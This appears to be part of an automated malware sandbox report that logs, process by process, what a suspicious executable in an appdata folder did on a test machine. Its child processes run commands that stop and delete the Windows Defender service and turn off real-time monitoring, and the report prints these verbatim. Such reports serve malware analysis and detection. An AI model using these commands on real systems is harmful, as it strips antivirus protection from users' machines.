1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #17: cmd.exe
60
0
| Information | Value |
|---|---|
| ID | #17 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" /c sc stop WinDefend |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:54, Reason: Child Process |
| Unmonitor | End Time: 00:00:57, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xfd8 |
| Parent PID | 0xfac (c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FDC
|
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\sc.exe | os_pid = 0x83c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x4a830000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76b10000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76b624c2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x76b4ac6c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76b53ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76b62732 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-24 06:58:31 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10905343 |
|
1 | |
| Get Time | type = Performance Ctr, time = 12937850504 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #18: cmd.exe
60
0
| Information | Value |
|---|---|
| ID | #18 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" /c sc delete WinDefend |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:55, Reason: Child Process |
| Unmonitor | End Time: 00:00:57, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xffc |
| Parent PID | 0xfac (c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
818
|
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\sc.exe | os_pid = 0x8e4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x4a830000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76b10000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76b624c2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x76b4ac6c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76b53ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76b62732 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-24 06:58:31 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10906014 |
|
1 | |
| Get Time | type = Performance Ctr, time = 13004619591 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #19: powershell.exe
828
0
| Information | Value |
|---|---|
| ID | #19 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | powershell Set-MpPreference -DisableRealtimeMonitoring $true |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:55, Reason: Child Process |
| Unmonitor | End Time: 00:01:06, Reason: Self Terminated |
| Monitor Duration | 00:00:10 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x81c |
| Parent PID | 0xfc4 (c:\windows\system32\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
114
0x
8CC
0x
8FC
0x
240
0x
908
0x
23C
0x
824
0x
820
|
Host Behavior
File (394)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
2 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
6 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Users\2XC7u663GxWc | type = file_attributes |
|
1 | |
| Get Info | C:\ | type = file_attributes |
|
6 | |
| Get Info | C:\Windows\system32 | type = file_attributes |
|
7 | |
| Get Info | C:\Windows | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\Documents\WindowsPowerShell\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 4096 |
|
3 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 3315 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 781, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 4096 |
|
41 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 436 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 2530 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 542, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4096 |
|
5 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4018 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 78, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 2762 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 310, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 4096 |
|
17 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 3022 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 50, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 281 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 4096 |
|
62 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 3895 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 201, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 4096 |
|
21 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 3687 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 409, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 2228 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 844, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 3736 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 360, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 62 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 17 |
|
1 | |
